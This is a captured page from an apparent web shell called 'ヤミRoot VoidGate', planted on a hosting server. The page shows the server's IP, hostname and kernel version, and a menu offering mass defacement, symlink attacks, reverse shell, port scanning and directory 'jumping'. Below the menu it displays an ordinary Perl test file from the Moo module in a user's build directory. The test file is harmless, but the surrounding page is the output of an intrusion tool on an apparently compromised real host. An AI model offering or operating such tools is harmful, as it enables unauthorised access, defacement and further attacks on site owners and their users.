ヤミRoot VoidGate
User / IP
:
216.73.216.2
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
.cpanm
/
work
/
1568630680.21759
/
Moo-2.003004
/
t
/
Viewing: strictures.t
BEGIN { delete $ENV{MOO_FATAL_WARNINGS} } use strict; use warnings; use Test::More; $INC{'strictures.pm'} = __FILE__; my $strictures = 0; my $version; sub strictures::VERSION { $version = $_[1]; 2;; } sub strictures::import { $strictures++; strict->import; warnings->import(FATAL => 'all'); } local $SIG{__WARN__} = sub {}; eval q{ use Moo::_strictures; 0 + "string"; }; is $strictures, 0, 'strictures not imported without MOO_FATAL_WARNINGS'; is $@, '', 'warnings not fatal without MOO_FATAL_WARNINGS'; $ENV{MOO_FATAL_WARNINGS} = 1; eval q{ use Moo::_strictures; 0 + "string"; }; is $strictures, 1, 'strictures imported with MOO_FATAL_WARNINGS'; is $version, 2, 'strictures version 2 requested with MOO_FATAL_WARNINGS'; like $@, qr/isn't numeric/, 'warnings fatal with MOO_FATAL_WARNINGS'; done_testing;
Coded With 💗 by
0x6ick